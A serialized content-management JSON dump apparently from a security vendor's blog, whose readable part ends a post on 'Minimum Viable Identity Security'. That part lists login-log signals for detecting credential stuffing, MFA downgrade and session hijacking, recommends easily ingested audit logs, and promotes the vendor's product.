location/impossible travel",[],{},{"nodeType":254,"data":115235,"content":115236},{},[115237],{"nodeType":178,"data":115238,"content":115239},{},[115240],{"nodeType":173,"value":115241,"marks":115242,"data":115243},"Identify failed login attempts due to either credential or MFA failures, indicating possible credential stuffing attacks",[],{},{"nodeType":254,"data":115245,"content":115246},{},[115247],{"nodeType":178,"data":115248,"content":115249},{},[115250],{"nodeType":173,"value":115251,"marks":115252,"data":115253},"Identify the IdP used to login to detect unapproved or unusual IdP logins (a possible indicator of cross-IdP impersonation)",[],{},{"nodeType":254,"data":115255,"content":115256},{},[115257],{"nodeType":178,"data":115258,"content":115259},{},[115260],{"nodeType":173,"value":115261,"marks":115262,"data":115263},"Identify where an unexpected (less secure) MFA method is used, indicating a potential MFA downgrade attack",[],{},{"nodeType":254,"data":115265,"content":115266},{},[115267],{"nodeType":178,"data":115268,"content":115269},{},[115270],{"nodeType":173,"value":115271,"marks":115272,"data":115273},"Detect risky changes to authentication such as initiating SAML configuration changes, tracking which user initiated it and when it completed",[],{},{"nodeType":254,"data":115275,"content":115276},{},[115277],{"nodeType":178,"data":115278,"content":115279},{},[115280],{"nodeType":173,"value":115281,"marks":115282,"data":115283},"Differentiate active session location from the device/client/location of the original session (to detect session hijacking attacks)",[],{},{"nodeType":235,"data":115285,"content":115286},{},[115287],{"nodeType":173,"value":115288,"marks":115289,"data":115291},"8. Make audit logs available in a format and using a mechanism that is easy to ingest into common security tools. ",[115290],{"type":370},{},{"nodeType":178,"data":115293,"content":115294},{},[115295,115299,115308],{"nodeType":173,"value":115296,"marks":115297,"data":115298},"Even where logs are available, security teams often have to wrestle with the format they are provided in to be able to make use of them. While JSON is pretty much the de facto standard nowadays, the absence of a common schema and field names is often the tricky part — complicated by the fact that there are multiple competing standards. At the very least, complying with at least one of the more established schemas (e.g. the ",[],{},{"nodeType":186,"data":115300,"content":115302},{"uri":115301},"https://www.elastic.co/guide/en/ecs/current/ecs-reference.html",[115303],{"nodeType":173,"value":115304,"marks":115305,"data":115307},"Elastic Common Schema",[115306],{"type":194},{},{"nodeType":173,"value":115309,"marks":115310,"data":115311},") will provide a level of standardisation to make things easier for security teams.",[],{},{"nodeType":178,"data":115313,"content":115314},{},[115315],{"nodeType":173,"value":115316,"marks":115317,"data":115318},"Arguably an even bigger challenge is pulling the events you actually need from the data — so making it possible to stream logs or access them programmatically to minimize collection delays is a key change that app developers can implement regardless of the schema used, that will make life easier for SecOps teams. With that in mind: ",[],{},{"nodeType":250,"data":115320,"content":115321},{},[115322,115332],{"nodeType":254,"data":115323,"content":115324},{},[115325],{"nodeType":178,"data":115326,"content":115327},{},[115328],{"nodeType":173,"value":115329,"marks":115330,"data":115331},"Login events indicating a potential identity attack should emit preconfigured webhook events to enable security teams to better detect and respond, (such as in the context of the use cases above). ",[],{},{"nodeType":254,"data":115333,"content":115334},{},[115335],{"nodeType":178,"data":115336,"content":115337},{},[115338],{"nodeType":173,"value":115339,"marks":115340,"data":115341},"API access should also be provided to ensure that logs can be extracted to inform point-in-time investigations in the event of a suspected incident. (It’s no good if you have to request that certain logs be sent to you during a time-sensitive security incident.) ",[],{},{"nodeType":231,"data":115343,"content":115344},{},[],{"nodeType":169,"data":115346,"content":115347},{},[115348],{"nodeType":173,"value":27838,"marks":115349,"data":115351},[115350],{"type":370},{},{"nodeType":178,"data":115353,"content":115354},{},[115355],{"nodeType":173,"value":115356,"marks":115357,"data":115358},"The key takeaway here is that the scope for identity attacks and abuse could be significantly mitigated with a better standard of app-level controls. If you’re familiar with Push, you’ll recognize that many of our features compensate for these gaps in visibility and control — made necessary by the fact that so many apps don’t provide basic information about the accounts within your tenant, or give you any controls to manage authentication in accordance with your risk profile.",[],{},{"nodeType":312,"data":115360,"content":115364},{"target":115361},{"sys":115362},{"id":115363,"type":317,"linkType":318},"2skTQlf4ssC083ilExzKPW",[],{"nodeType":178,"data":115366,"content":115367},{},[115368],{"nodeType":173,"value":115369,"marks":115370,"data":115371},"If you agree with us and think that stronger identity controls around authentication and security logging are needed, then consider adding these suggestions to your procurement requirements when on-boarding new apps and services. ",[],{},{"nodeType":178,"data":115373,"content":115374},{},[115375,115378,115385],{"nodeType":173,"value":37,"marks":115376,"data":115377},[],{},{"nodeType":186,"data":115379,"content":115380},{"uri":473},[115381],{"nodeType":173,"value":93499,"marks":115382,"data":115384},[115383],{"type":194},{},{"nodeType":173,"value":115386,"marks":115387,"data":115388}," to find out how Push can mitigate widespread application security gaps and secure your identity attack surface. ",[],{},{"nodeType":312,"data":115390,"content":115394},{"target":115391},{"sys":115392},{"id":115393,"type":317,"linkType":318},"34OTFgwuW60VWzW4FAqwXi",[],{"nodeType":178,"data":115396,"content":115397},{},[115398],{"nodeType":173,"value":37,"marks":115399,"data":115400},[],{},"Minimum Viable Identity Security","How app developers can go beyond Minimum Viable Secure Product (MVSP) to implement better identity protections and prevent identity-based attacks. ","2025-02-10T00:00:00.000Z","minimum-viable-identity-security",{"items":115406},[115407,115409],{"sys":115408,"name":26137},{"id":26136},{"sys":115410,"name":509},{"id":508},{"items":115412},[115413],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":115414},{"url":1496},{"__typename":1528,"sys":115416,"content":115417,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":115691,"authorsCollection":115697},{"id":162},{"json":115418},{"nodeType":165,"data":115419,"content":115420},{},[115421,115427,115443,115456,115462,115468,115471,115477,115483,115531,115537,115542,115545,115551,115557,115563,115569,115575,115589,115594,115600,115606,115620,115625,115631,115637,115643,115649,115655,115658,115664,115680,115685],{"nodeType":169,"data":115422,"content":115423},{},[115424],{"nodeType":173,"value":174,"marks":115425,"data":115426},[],{},{"nodeType":178,"data":115428,"content":115429},{},[115430,115433,115440],{"nodeType":173,"value":182,"marks":115431,"data":115432},[],{},{"nodeType":186,"data":115434,"content":115435},{"uri":188},[115436],{"nodeType":173,"value":191,"marks":115437,"data":115439},[115438],{"type":194},{},{"nodeType":173,"value":197,"marks":115441,"data":115442},[],{},{"nodeType":178,"data":115444,"content":115445},{},[115446,115449,115453],{"nodeType":173,"value":204,"marks":115447,"data":115448},[],{},{"nodeType":173,"value":208,"marks":115450,"data":115452},[115451],{"type":194},{},{"nodeType":173,"value":213,"marks":115454,"data":115455},[],{},{"nodeType":178,"data":115457,"content":115458},{},[115459],{"nodeType":173,"value":220,"marks":115460,"data":115461},[],{},{"nodeType":178,"data":115463,"content":115464},{},[115465],{"nodeType":173,"value":227,"marks":115466,"data":115467},[],{},{"nodeType":231,"data":115469,"content":115470},{},[],{"nodeType":235,"data":115472,"content":115473},{},[115474],{"nodeType":173,"value":239,"marks":115475,"data":115476},[],{},{"nodeType":178,"data":115478,"content":115479},{},[115480],{"nodeType":173,"value":246,"marks":115481,"data":115482},[],{},{"nodeType":250,"data":115484,"content":115485},{},[115486,115495,115504,115513,115522],{"nodeType":254,"data":115487,"content":115488},{},[115489],{"nodeType":178,"data":115490,"content":115491},{},[115492],{"nodeType":173,"value":261,"marks":115493,"data":115494},[],{},{"nodeType":254,"data":115496,"content":115497},{},[115498],{"nodeType":178,"data":115499,"content":115500},{},[115501],{"nodeType":173,"value":271,"marks":115502,"data":115503},[],{},{"nodeType":254,"data":115505,"content":115506},{},[115507],{"nodeType":178,"data":115508,"content":115509},{},[115510],{"nodeType":173,"value":281,"marks":115511,"data":115512},[],{},{"nodeType":254,"data":115514,"content":115515},{},[115516],{"nodeType":178,"data":115517,"content":115518},{},[115519],{"nodeType":173,"value":291,"marks":115520,"data":115521},[],{},{"nodeType":254,"data":115523,"content":115524},{},[115525],{"nodeType":178,"data":115526,"content":115527},{},[115528],{"nodeType":173,"value":301,"marks":115529,"data":115530},[],{},{"nodeType":178,"data":115532,"content":115533},{},[115534],{"nodeType":173,"value":308,"marks":115535,"data":115536},[],{},{"nodeType":312,"data":115538,"content":115541},{"target":115539},{"sys":115540},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":115543,"content":115544},{},[],{"nodeType":235,"data":115546,"content":115547},{},[115548],{"nodeType":173,"value":327,"marks":115549,"data":115550},[],{},{"nodeType":178,"data":115552,"content":115553},{},[115554],{"nodeType":173,"value":334,"marks":115555,"data":115556},[],{},{"nodeType":178,"data":115558,"content":115559},{},[115560],{"nodeType":173,"value":341,"marks":115561,"data":115562},[],{},{"nodeType":178,"data":115564,"content":115565},{},[115566],{"nodeType":173,"value":348,"marks":115567,"data":115568},[],{},{"nodeType":178,"data":115570,"content":115571},{},[115572],{"nodeType":173,"value":355,"marks":115573,"data":115574},[],{},{"nodeType":235,"data":115576,"content":115577},{},[115578,115581,115586],{"nodeType":173,"value":362,"marks":115579,"data":115580},[],{},{"nodeType":173,"value":366,"marks":115582,"data":115585},[115583,115584],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":115587,"data":115588},[],{},{"nodeType":312,"data":115590,"content":115593},{"target":115591},{"sys":115592},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":115595,"content":115596},{},[115597],{"nodeType":173,"value":386,"marks":115598,"data":115599},[],{},{"nodeType":178,"data":115601,"content":115602},{},[115603],{"nodeType":173,"value":393,"marks":115604,"data":115605},[],{},{"nodeType":235,"data":115607,"content":115608},{},[115609,115612,115617],{"nodeType":173,"value":400,"marks":115610,"data":115611},[],{},{"nodeType":173,"value":404,"marks":115613,"data":115616},[115614,115615],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":115618,"data":115619},[],{},{"nodeType":312,"data":115621,"content":115624},{"target":115622},{"sys":115623},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":115626,"content":115627},{},[115628],{"nodeType":173,"value":423,"marks":115629,"data":115630},[],{},{"nodeType":178,"data":115632,"content":115633},{},[115634],{"nodeType":173,"value":430,"marks":115635,"data":115636},[],{},{"nodeType":178,"data":115638,"content":115639},{},[115640],{"nodeType":173,"value":437,"marks":115641,"data":115642},[],{},{"nodeType":178,"data":115644,"content":115645},{},[115646],{"nodeType":173,"value":444,"marks":115647,"data":115648},[],{},{"nodeType":178,"data":115650,"content":115651},{},[115652],{"nodeType":173,"value":451,"marks":115653,"data":115654},[],{},{"nodeType":231,"data":115656,"content":115657},{},[],{"nodeType":169,"data":115659,"content":115660},{},[115661],{"nodeType":173,"value":461,"marks":115662,"data":115663},[],{},{"nodeType":178,"data":115665,"content":115666},{},[115667,115670,115677],{"nodeType":173,"value":468,"marks":115668,"data":115669},[],{},{"nodeType":186,"data":115671,"content":115672},{"uri":473},[115673],{"nodeType":173,"value":476,"marks":115674,"data":115676},[115675],{"type":194},{},{"nodeType":173,"value":481,"marks":115678,"data":115679},[],{},{"nodeType":312,"data":115681,"content":115684},{"target":115682},{"sys":115683},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":115686,"content":115687},{},[115688],{"nodeType":173,"value":37,"marks":115689,"data":115690},[],{},{"items":115692},[115693,115695],{"sys":115694,"name":505},{"id":504},{"sys":115696,"name":509},{"id":508},{"items":115698},[115699],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":115700},{"url":516},{"__typename":1528,"sys":115702,"content":115703,"title":46334,"synopsis":105212,"hashTags":118,"publishedDate":105213,"slug":46335,"tagsCollection":116862,"authorsCollection":116868},{"id":25066},{"json":115704},{"nodeType":165,"data":115705,"content":115706},{},[115707,115712,115719,115725,115751,115756,115763,115789,115823,115828,115835,115850,115855,115858,115865,115871,115876,115912,116042,116045,116052,116058,116065,116091,116096,116103,116119,116125,116130,116136,116141,116157,116164,116180,116187,116193,116199,116202,116209,116215,116220,116226,116233,116249,116255,116260,116267,116273,116279,116305,116310,116316,116323,116329,116334,116360,116367,116383,116389,116394,116401,116417,116423,116480,116485,116488,116495,116501,116507,116533,116536,116543,116550,116555,116561,116568,116573,116579,116585,116590,116596,116603,116609,116615,116621,116637,116653,116659,116665,116670,116676,116683,116689,116695,116700,116706,116713,116719,116725,116731,116736,116742,116749,116755,116771,116776,116782,116799,116804,116810,116826,116831,116834,116841,116847],{"nodeType":312,"data":115708,"content":115711},{"target":115709},{"sys":115710},{"id":100724,"type":317,"linkType":318},[],{"nodeType":169,"data":115713,"content":115714},{},[115715],{"nodeType":173,"value":103916,"marks":115716,"data":115718},[115717],{"type":370},{},{"nodeType":178,"data":115720,"content":115721},{},[115722],{"nodeType":173,"value":103924,"marks":115723,"data":115724},[],{},{"nodeType":178,"data":115726,"content":115727},{},[115728,115731,115738,115741,115748],{"nodeType":173,"value":103931,"marks":115729,"data":115730},[],{},{"nodeType":186,"data":115732,"content":115733},{"uri":102646},[115734],{"nodeType":173,"value":102649,"marks":115735,"data":115737},[115736],{"type":194},{},{"nodeType":173,"value":9534,"marks":115739,"data":115740},[],{},{"nodeType":186,"data":115742,"content":115743},{"uri":819},[115744],{"nodeType":173,"value":102660,"marks":115745,"data":115747},[115746],{"type":194},{},{"nodeType":173,"value":103952,"marks":115749,"data":115750},[],{},{"nodeType":312,"data":115752,"content":115755},{"target":115753},{"sys":115754},{"id":103959,"type":317,"linkType":318},[],{"nodeType":235,"data":115757,"content":115758},{},[115759],{"nodeType":173,"value":103965,"marks":115760,"data":115762},[115761],{"type":370},{},{"nodeType":178,"data":115764,"content":115765},{},[115766,115769,115776,115779,115786],{"nodeType":173,"value":103973,"marks":115767,"data":115768},[],{},{"nodeType":186,"data":115770,"content":115771},{"uri":88025},[115772],{"nodeType":173,"value":88028,"marks":115773,"data":115775},[115774],{"type":194},{},{"nodeType":173,"value":103984,"marks":115777,"data":115778},[],{},{"nodeType":186,"data":115780,"content":115781},{"uri":989},[115782],{"nodeType":173,"value":992,"marks":115783,"data":115785},[115784],{"type":194},{},{"nodeType":173,"value":103995,"marks":115787,"data":115788},[],{},{"nodeType":178,"data":115790,"content":115791},{},[115792,115795,115799,115802,115806,115809,115813,115816,115820],{"nodeType":173,"value":104002,"marks":115793,"data":115794},[],{},{"nodeType":173,"value":104006,"marks":115796,"data":115798},[115797],{"type":370},{},{"nodeType":173,"value":104011,"marks":115800,"data":115801},[],{},{"nodeType":173,"value":104015,"marks":115803,"data":115805},[115804],{"type":370},{},{"nodeType":173,"value":104020,"marks":115807,"data":115808},[],{},{"nodeType":173,"value":104024,"marks":115810,"data":115812},[115811],{"type":370},{},{"nodeType":173,"value":104029,"marks":115814,"data":115815},[],{},{"nodeType":173,"value":104033,"marks":115817,"data":115819},[115818],{"type":370},{},{"nodeType":173,"value":197,"marks":115821,"data":115822},[],{},{"nodeType":312,"data":115824,"content":115827},{"target":115825},{"sys":115826},{"id":104044,"type":317,"linkType":318},[],{"nodeType":235,"data":115829,"content":115830},{},[115831],{"nodeType":173,"value":104050,"marks":115832,"data":115834},[115833],{"type":370},{},{"nodeType":178,"data":115836,"content":115837},{},[115838,115841,115847],{"nodeType":173,"value":104058,"marks":115839,"data":115840},[],{},{"nodeType":186,"data":115842,"content":115843},{"uri":819},[115844],{"nodeType":173,"value":104065,"marks":115845,"data":115846},[],{},{"nodeType":173,"value":104069,"marks":115848,"data":115849},[],{},{"nodeType":312,"data":115851,"content":115854},{"target":115852},{"sys":115853},{"id":104076,"type":317,"linkType":318},[],{"nodeType":231,"data":115856,"content":115857},{},[],{"nodeType":169,"data":115859,"content":115860},{},[115861],{"nodeType":173,"value":104085,"marks":115862,"data":115864},[115863],{"type":370},{},{"nodeType":178,"data":115866,"content":115867},{},[115868],{"nodeType":173,"value":104093,"marks":115869,"data":115870},[],{},{"nodeType":312,"data":115872,"content":115875},{"target":115873},{"sys":115874},{"id":104100,"type":317,"linkType":318},[],{"nodeType":178,"data":115877,"content":115878},{},[115879,115882,115889,115892,115899,115902,115909],{"nodeType":173,"value":104106,"marks":115880,"data":115881},[],{},{"nodeType":186,"data":115883,"content":115884},{"uri":104111},[115885],{"nodeType":173,"value":100738,"marks":115886,"data":115888},[115887],{"type":194},{},{"nodeType":173,"value":2936,"marks":115890,"data":115891},[],{},{"nodeType":186,"data":115893,"content":115894},{"uri":100747},[115895],{"nodeType":173,"value":100750,"marks":115896,"data":115898},[115897],{"type":194},{},{"nodeType":173,"value":9534,"marks":115900,"data":115901},[],{},{"nodeType":186,"data":115903,"content":115904},{"uri":104132},[115905],{"nodeType":173,"value":104135,"marks":115906,"data":115908},[115907],{"type":194},{},{"nodeType":173,"value":104140,"marks":115910,"data":115911},[],{},{"nodeType":178,"data":115913,"content":115914},{},[115915,115918,115925,115928,115935,115938,115945,115948,115955,115958,115965,115968,115975,115978,115985,115988,115994,115997,116003,116006,116012,116015,116021,116024,116030,116033,116039],{"nodeType":173,"value":100762,"marks":115916,"data":115917},[],{},{"nodeType":186,"data":115919,"content":115920},{"uri":100767},[115921],{"nodeType":173,"value":100770,"marks":115922,"data":115924},[115923],{"type":194},{},{"nodeType":173,"value":2936,"marks":115926,"data":115927},[],{},{"nodeType":186,"data":115929,"content":115930},{"uri":100779},[115931],{"nodeType":173,"value":100782,"marks":115932,"data":115934},[115933],{"type":194},{},{"nodeType":173,"value":2936,"marks":115936,"data":115937},[],{},{"nodeType":186,"data":115939,"content":115940},{"uri":100791},[115941],{"nodeType":173,"value":100794,"marks":115942,"data":115944},[115943],{"type":194},{},{"nodeType":173,"value":2936,"marks":115946,"data":115947},[],{},{"nodeType":186,"data":115949,"content":115950},{"uri":100803},[115951],{"nodeType":173,"value":100806,"marks":115952,"data":115954},[115953],{"type":194},{},{"nodeType":173,"value":2936,"marks":115956,"data":115957},[],{},{"nodeType":186,"data":115959,"content":115960},{"uri":100815},[115961],{"nodeType":173,"value":100818,"marks":115962,"data":115964},[115963],{"type":194},{},{"nodeType":173,"value":2936,"marks":115966,"data":115967},[],{},{"nodeType":186,"data":115969,"content":115970},{"uri":100827},[115971],{"nodeType":173,"value":100830,"marks":115972,"data":115974},[115973],{"type":194},{},{"nodeType":173,"value":9534,"marks":115976,"data":115977},[],{},{"nodeType":186,"data":115979,"content":115980},{"uri":100839},[115981],{"nodeType":173,"value":100842,"marks":115982,"data":115984},[115983],{"type":194},{},{"nodeType":173,"value":104217,"marks":115986,"data":115987},[],{},{"nodeType":186,"data":115989,"content":115990},{"uri":100859},[115991],{"nodeType":173,"value":100862,"marks":115992,"data":115993},[],{},{"nodeType":173,"value":2936,"marks":115995,"data":115996},[],{},{"nodeType":186,"data":115998,"content":115999},{"uri":100871},[116000],{"nodeType":173,"value":100874,"marks":116001,"data":116002},[],{},{"nodeType":173,"value":2936,"marks":116004,"data":116005},[],{},{"nodeType":186,"data":116007,"content":116008},{"uri":100884},[116009],{"nodeType":173,"value":100887,"marks":116010,"data":116011},[],{},{"nodeType":173,"value":2936,"marks":116013,"data":116014},[],{},{"nodeType":186,"data":116016,"content":116017},{"uri":100908},[116018],{"nodeType":173,"value":100911,"marks":116019,"data":116020},[],{},{"nodeType":173,"value":2936,"marks":116022,"data":116023},[],{},{"nodeType":186,"data":116025,"content":116026},{"uri":100908},[116027],{"nodeType":173,"value":100921,"marks":116028,"data":116029},[],{},{"nodeType":173,"value":9534,"marks":116031,"data":116032},[],{},{"nodeType":186,"data":116034,"content":116035},{"uri":100897},[116036],{"nodeType":173,"value":100900,"marks":116037,"data":116038},[],{},{"nodeType":173,"value":1477,"marks":116040,"data":116041},[],{},{"nodeType":231,"data":116043,"content":116044},{},[],{"nodeType":169,"data":116046,"content":116047},{},[116048],{"nodeType":173,"value":104281,"marks":116049,"data":116051},[116050],{"type":370},{},{"nodeType":178,"data":116053,"content":116054},{},[116055],{"nodeType":173,"value":104289,"marks":116056,"data":116057},[],{},{"nodeType":235,"data":116059,"content":116060},{},[116061],{"nodeType":173,"value":104296,"marks":116062,"data":116064},[116063],{"type":370},{},{"nodeType":178,"data":116066,"content":116067},{},[116068,116071,116078,116081,116088],{"nodeType":173,"value":104304,"marks":116069,"data":116070},[],{},{"nodeType":186,"data":116072,"content":116073},{"uri":104309},[116074],{"nodeType":173,"value":104312,"marks":116075,"data":116077},[116076],{"type":194},{},{"nodeType":173,"value":933,"marks":116079,"data":116080},[],{},{"nodeType":186,"data":116082,"content":116083},{"uri":775},[116084],{"nodeType":173,"value":104323,"marks":116085,"data":116087},[116086],{"type":194},{},{"nodeType":173,"value":104328,"marks":116089,"data":116090},[],{},{"nodeType":312,"data":116092,"content":116095},{"target":116093},{"sys":116094},{"id":104335,"type":317,"linkType":318},[],{"nodeType":235,"data":116097,"content":116098},{},[116099],{"nodeType":173,"value":104341,"marks":116100,"data":116102},[116101],{"type":370},{},{"nodeType":178,"data":116104,"content":116105},{},[116106,116109,116116],{"nodeType":173,"value":104349,"marks":116107,"data":116108},[],{},{"nodeType":186,"data":116110,"content":116111},{"uri":104354},[116112],{"nodeType":173,"value":104357,"marks":116113,"data":116115},[116114],{"type":194},{},{"nodeType":173,"value":104362,"marks":116117,"data":116118},[],{},{"nodeType":178,"data":116120,"content":116121},{},[116122],{"nodeType":173,"value":104369,"marks":116123,"data":116124},[],{},{"nodeType":312,"data":116126,"content":116129},{"target":116127},{"sys":116128},{"id":104376,"type":317,"linkType":318},[],{"nodeType":178,"data":116131,"content":116132},{},[116133],{"nodeType":173,"value":104382,"marks":116134,"data":116135},[],{},{"nodeType":312,"data":116137,"content":116140},{"target":116138},{"sys":116139},{"id":104389,"type":317,"linkType":318},[],{"nodeType":178,"data":116142,"content":116143},{},[116144,116147,116154],{"nodeType":173,"value":104395,"marks":116145,"data":116146},[],{},{"nodeType":186,"data":116148,"content":116149},{"uri":104400},[116150],{"nodeType":173,"value":104403,"marks":116151,"data":116153},[116152],{"type":194},{},{"nodeType":173,"value":60235,"marks":116155,"data":116156},[],{},{"nodeType":235,"data":116158,"content":116159},{},[116160],{"nodeType":173,"value":104414,"marks":116161,"data":116163},[116162],{"type":370},{},{"nodeType":178,"data":116165,"content":116166},{},[116167,116170,116177],{"nodeType":173,"value":104422,"marks":116168,"data":116169},[],{},{"nodeType":186,"data":116171,"content":116172},{"uri":989},[116173],{"nodeType":173,"value":992,"marks":116174,"data":116176},[116175],{"type":194},{},{"nodeType":173,"value":104433,"marks":116178,"data":116179},[],{},{"nodeType":235,"data":116181,"content":116182},{},[116183],{"nodeType":173,"value":104440,"marks":116184,"data":116186},[116185],{"type":370},{},{"nodeType":178,"data":116188,"content":116189},{},[116190],{"nodeType":173,"value":104448,"marks":116191,"data":116192},[],{},{"nodeType":178,"data":116194,"content":116195},{},[116196],{"nodeType":173,"value":104455,"marks":116197,"data":116198},[],{},{"nodeType":231,"data":116200,"content":116201},{},[],{"nodeType":169,"data":116203,"content":116204},{},[116205],{"nodeType":173,"value":104465,"marks":116206,"data":116208},[116207],{"type":370},{},{"nodeType":178,"data":116210,"content":116211},{},[116212],{"nodeType":173,"value":104473,"marks":116213,"data":116214},[],{},{"nodeType":312,"data":116216,"content":116219},{"target":116217},{"sys":116218},{"id":104480,"type":317,"linkType":318},[],{"nodeType":178,"data":116221,"content":116222},{},[116223],{"nodeType":173,"value":104486,"marks":116224,"data":116225},[],{},{"nodeType":235,"data":116227,"content":116228},{},[116229],{"nodeType":173,"value":104493,"marks":116230,"data":116232},[116231],{"type":370},{},{"nodeType":178,"data":116234,"content":116235},{},[116236,116239,116246],{"nodeType":173,"value":37,"marks":116237,"data":116238},[],{},{"nodeType":186,"data":116240,"content":116241},{"uri":104400},[116242],{"nodeType":173,"value":104507,"marks":116243,"data":116245},[116244],{"type":194},{},{"nodeType":173,"value":104512,"marks":116247,"data":116248},[],{},{"nodeType":178,"data":116250,"content":116251},{},[116252],{"nodeType":173,"value":104519,"marks":116253,"data":116254},[],{},{"nodeType":312,"data":116256,"content":116259},{"target":116257},{"sys":116258},{"id":98333,"type":317,"linkType":318},[],{"nodeType":235,"data":116261,"content":116262},{},[116263],{"nodeType":173,"value":104531,"marks":116264,"data":116266},[116265],{"type":370},{},{"nodeType":178,"data":116268,"content":116269},{},[116270],{"nodeType":173,"value":104539,"marks":116271,"data":116272},[],{},{"nodeType":178,"data":116274,"content":116275},{},[116276],{"nodeType":173,"value":104546,"marks":116277,"data":116278},[],{},{"nodeType":178,"data":116280,"content":116281},{},[116282,116285,116292,116295,116302],{"nodeType":173,"value":104553,"marks":116283,"data":116284},[],{},{"nodeType":186,"data":116286,"content":116287},{"uri":14287},[116288],{"nodeType":173,"value":104560,"marks":116289,"data":116291},[116290],{"type":194},{},{"nodeType":173,"value":104565,"marks":116293,"data":116294},[],{},{"nodeType":186,"data":116296,"content":116297},{"uri":81553},[116298],{"nodeType":173,"value":104572,"marks":116299,"data":116301},[116300],{"type":194},{},{"nodeType":173,"value":104577,"marks":116303,"data":116304},[],{},{"nodeType":312,"data":116306,"content":116309},{"target":116307},{"sys":116308},{"id":104584,"type":317,"linkType":318},[],{"nodeType":178,"data":116311,"content":116312},{},[116313],{"nodeType":173,"value":104590,"marks":116314,"data":116315},[],{},{"nodeType":235,"data":116317,"content":116318},{},[116319],{"nodeType":173,"value":104597,"marks":116320,"data":116322},[116321],{"type":370},{},{"nodeType":178,"data":116324,"content":116325},{},[116326],{"nodeType":173,"value":104605,"marks":116327,"data":116328},[],{},{"nodeType":312,"data":116330,"content":116333},{"target":116331},{"sys":116332},{"id":69626,"type":317,"linkType":318},[],{"nodeType":178,"data":116335,"content":116336},{},[116337,116340,116347,116350,116357],{"nodeType":173,"value":104617,"marks":116338,"data":116339},[],{},{"nodeType":186,"data":116341,"content":116342},{"uri":104622},[116343],{"nodeType":173,"value":104625,"marks":116344,"data":116346},[116345],{"type":194},{},{"nodeType":173,"value":104630,"marks":116348,"data":116349},[],{},{"nodeType":186,"data":116351,"content":116352},{"uri":61655},[116353],{"nodeType":173,"value":8091,"marks":116354,"data":116356},[116355],{"type":194},{},{"nodeType":173,"value":104641,"marks":116358,"data":116359},[],{},{"nodeType":235,"data":116361,"content":116362},{},[116363],{"nodeType":173,"value":104648,"marks":116364,"data":116366},[116365],{"type":370},{},{"nodeType":178,"data":116368,"content":116369},{},[116370,116373,116380],{"nodeType":173,"value":104656,"marks":116371,"data":116372},[],{},{"nodeType":186,"data":116374,"content":116375},{"uri":104661},[116376],{"nodeType":173,"value":104664,"marks":116377,"data":116379},[116378],{"type":194},{},{"nodeType":173,"value":104669,"marks":116381,"data":116382},[],{},{"nodeType":178,"data":116384,"content":116385},{},[116386],{"nodeType":173,"value":104676,"marks":116387,"data":116388},[],{},{"nodeType":312,"data":116390,"content":116393},{"target":116391},{"sys":116392},{"id":104683,"type":317,"linkType":318},[],{"nodeType":235,"data":116395,"content":116396},{},[116397],{"nodeType":173,"value":104689,"marks":116398,"data":116400},[116399],{"type":370},{},{"nodeType":178,"data":116402,"content":116403},{},[116404,116407,116414],{"nodeType":173,"value":104697,"marks":116405,"data":116406},[],{},{"nodeType":186,"data":116408,"content":116409},{"uri":97747},[116410],{"nodeType":173,"value":104704,"marks":116411,"data":116413},[116412],{"type":194},{},{"nodeType":173,"value":104709,"marks":116415,"data":116416},[],{},{"nodeType":178,"data":116418,"content":116419},{},[116420],{"nodeType":173,"value":104716,"marks":116421,"data":116422},[],{},{"nodeType":250,"data":116424,"content":116425},{},[116426,116435,116444,116453,116462,116471],{"nodeType":254,"data":116427,"content":116428},{},[116429],{"nodeType":178,"data":116430,"content":116431},{},[116432],{"nodeType":173,"value":104729,"marks":116433,"data":116434},[],{},{"nodeType":254,"data":116436,"content":116437},{},[116438],{"nodeType":178,"data":116439,"content":116440},{},[116441],{"nodeType":173,"value":104739,"marks":116442,"data":116443},[],{},{"nodeType":254,"data":116445,"content":116446},{},[116447],{"nodeType":178,"data":116448,"content":116449},{},[116450],{"nodeType":173,"value":104749,"marks":116451,"data":116452},[],{},{"nodeType":254,"data":116454,"content":116455},{},[116456],{"nodeType":178,"data":116457,"content":116458},{},[116459],{"nodeType":173,"value":104759,"marks":116460,"data":116461},[],{},{"nodeType":254,"data":116463,"content":116464},{},[116465],{"nodeType":178,"data":116466,"content":116467},{},[116468],{"nodeType":173,"value":104769,"marks":116469,"data":116470},[],{},{"nodeType":254,"data":116472,"content":116473},{},[116474],{"nodeType":178,"data":116475,"content":116476},{},[116477],{"nodeType":173,"value":104779,"marks":116478,"data":116479},[],{},{"nodeType":312,"data":116481,"content":116484},{"target":116482},{"sys":116483},{"id":104786,"type":317,"linkType":318},[],{"nodeType":231,"data":116486,"content":116487},{},[],{"nodeType":169,"data":116489,"content":116490},{},[116491],{"nodeType":173,"value":104795,"marks":116492,"data":116494},[116493],{"type":370},{},{"nodeType":178,"data":116496,"content":116497},{},[116498],{"nodeType":173,"value":104803,"marks":116499,"data":116500},[],{},{"nodeType":178,"data":116502,"content":116503},{},[116504],{"nodeType":173,"value":104810,"marks":116505,"data":116506},[],{},{"nodeType":178,"data":116508,"content":116509},{},[116510,116513,116520,116523,116530],{"nodeType":173,"value":104817,"marks":116511,"data":116512},[],{},{"nodeType":186,"data":116514,"content":116515},{"uri":104822},[116516],{"nodeType":173,"value":104825,"marks":116517,"data":116519},[116518],{"type":194},{},{"nodeType":173,"value":104830,"marks":116521,"data":116522},[],{},{"nodeType":186,"data":116524,"content":116525},{"uri":81553},[116526],{"nodeType":173,"value":104837,"marks":116527,"data":116529},[116528],{"type":194},{},{"nodeType":173,"value":197,"marks":116531,"data":116532},[],{},{"nodeType":231,"data":116534,"content":116535},{},[],{"nodeType":169,"data":116537,"content":116538},{},[116539],{"nodeType":173,"value":104851,"marks":116540,"data":116542},[116541],{"type":370},{},{"nodeType":178,"data":116544,"content":116545},{},[116546],{"nodeType":173,"value":104859,"marks":116547,"data":116549},[116548],{"type":370},{},{"nodeType":312,"data":116551,"content":116554},{"target":116552},{"sys":116553},{"id":104867,"type":317,"linkType":318},[],{"nodeType":235,"data":116556,"content":116557},{},[116558],{"nodeType":173,"value":104873,"marks":116559,"